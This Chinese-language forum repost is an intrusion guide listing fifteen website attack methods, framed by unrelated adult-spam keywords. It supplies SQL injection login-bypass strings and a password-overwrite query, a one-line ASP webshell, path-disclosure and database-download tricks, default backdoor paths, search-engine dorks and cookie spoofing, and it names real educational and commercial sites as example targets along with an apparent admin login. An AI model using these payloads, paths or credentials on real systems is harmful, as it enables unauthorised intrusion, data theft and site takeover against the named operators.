免费热b视频在线观看_ 入侵的14種可利用方法

1.上傳漏洞[不多講]
pS: 如果看到:選擇你要上傳的文件 [重新上傳]或者出現“請登陸后使用”，80%就有漏洞了！
有時(shí)上傳不一定會(huì )成功,這是因為Cookies不一樣.我們就要用WSockExpert取得Cookies.再用DOMAIN上傳.

2.注入漏洞[不多講]
pS:對MD5密碼.有時(shí)我們不是哪么容易跑出來(lái).如果是[SQL數據庫].那么我們可以用以下命令:
  http://注入網(wǎng)址;update admin set password=’新MD5密碼’ where password=’舊MD5密碼’--    [admin為表名.]

3.旁注,也就是跨站.
我們入侵某站時(shí)可能這個(gè)站堅固的無(wú)懈可擊，我們可以找下和這個(gè)站同一服務(wù)器的站點(diǎn)，然后在利用這個(gè)站點(diǎn)用提權，嗅探等方法來(lái)入侵我們要入侵的站點(diǎn)。，在這里有個(gè)難點(diǎn)，就是一些服務(wù)器的絕對路徑經(jīng)過(guò)加密，這就看我們的本事了


4.暴庫:把二級目錄中間的/換成%5c
EY:http://www.ahttc.edu.cn/otherweb ... s.asp?BigClassName=職責范圍&BigClassType=1
如果你能看到：’E:\ahttc040901\otherweb\dz\database\iXuEr_Studio.asa’不是一個(gè)有效的路徑。確定路徑名稱(chēng)拼寫(xiě)是否正確，以及是否連接到文件存放的服務(wù)器。
這樣的就是數據庫了。下載時(shí)用FLASHGET換成.MDB格式的就行.


5.’or’=’or’這是一個(gè)可以連接SQL的語(yǔ)名句.可以直接進(jìn)入后臺。我收集了一下。類(lèi)似的還有：
’or’’=’ " or "a"="a ’) or (’a’=’a ") or ("a"="a or 1=1-- ’ or ’a’=’a

6.社會(huì )工程學(xué)。這個(gè)我們都知道吧。就是猜解。
?。牛伲?a target="_blank">http://www.neu.edu.cn/waishi/admin
admin waishi

７.寫(xiě)入ASP格式數據庫。就是一句話(huà)木馬[〈%execute request("value")%〉 ]，常用在留言本.
ＥＹ：http://www.ahsdxy.ah.edu.cn/ebook/db/ebook.asp[這個(gè)就是ASP格式的數據庫]，再寫(xiě)入一句話(huà)木馬


8.源碼利用：一些網(wǎng)站用的都是網(wǎng)上下載的源碼.有的站長(cháng)很菜.什么也不改.
EY:http://www.ahsdxy.ah.edu.cn/xiaoyoulu/index.asp
這個(gè)站用的是：杰出校友錄，源碼我下過(guò)了，
默認數據庫/webshell路徑：\database\liangu_data.mdb 后臺管理：adm_login.asp 密碼及用戶(hù)名都是admin

9.默認數據庫/webshell路徑利用:這樣的網(wǎng)站很多/利人別人的WEBSHELL.
/Databackup/dvbbs7.MDB
/bbs/Databackup/dvbbs7.MDB
/bbs/Data/dvbbs7.MDB
/data/dvbbs7.mdb
/bbs/diy.asp
/diy.asp
/bbs/cmd.asp
/bbs/cmd.exe
/bbs/s-u.exe
/bbs/servu.exe
工具：網(wǎng)站獵手挖掘雞
EY：http://www.cl1999.com/bbs/Databackup/dvbbs7.MDB

10.查看目錄法:人一些網(wǎng)站可以斷開(kāi)目錄，可以方問(wèn)目錄。
EY：http://www.ujs168.com/shop/admin/
  http://escolourfvl.com/babyfox/admin/%23bb%23dedsed2s/
  這樣我們可以找到數據庫，下載不用我教吧

11.工具溢出:.asp?NewsID= /2j.asp?id=18 .asp?id=[這種方法可以取得大量的WEBSHELL]

12.搜索引擎利用:

(1).inurl:flasher_list.asp 默認數據庫:database/flash.mdb 后臺/manager/
(2).找網(wǎng)站的管理后臺地址:
site:xxxx.comintext:管理
site:xxxx.comintitle:管理〈關(guān)鍵字很多，自已找〉
site:xxxx.cominurl:login
(3).查找access的數據庫,mssql、mysql的連接文件
allinurl:bbsdata
filetype:mdbinurl:database
filetype:incconn
inurl:datafiletype:mdb
我主不做了。。自已做做吧。。

13.COOKIE詐騙：把自己的ID修改成管理員的，MD5密碼也修改成他的，用桂林老兵工具可以修改COOKIE。這個(gè)我就不多講了

14.利用常見(jiàn)的漏洞：如動(dòng)網(wǎng)BBS
EY：http://js1011.com/bbs/index.asp
可以先用:dvbbs權限提升工具，使自已成為前臺管理員。
THEN，運用:動(dòng)網(wǎng)固頂貼工具，找個(gè)固頂貼，再取得COOKIES，這個(gè)要你自已做。我們可以用WSockExpert取得Cookies/NC包
這個(gè)我就不做了，網(wǎng)上教程多的是，自已下個(gè)看看。
工具：dvbbs權限提升工具動(dòng)網(wǎng)固頂貼工具

15.還有一些老漏洞。如IIS3，4的查看源碼，5的DELETE
  CGI，PHP的一些老洞，我就不說(shuō)了啊。。太老了。沒(méi)有什么大用途。

本站僅提供存儲服務(wù)，所有內容均由用戶(hù)發(fā)布，如發(fā)現有害或侵權內容，請點(diǎn)擊舉報。

欧美性猛交XXXX免费看蜜桃,成人网18免费韩国,亚洲国产成人精品区综合,欧美日韩一区二区三区高清不卡,亚洲综合一区二区精品久久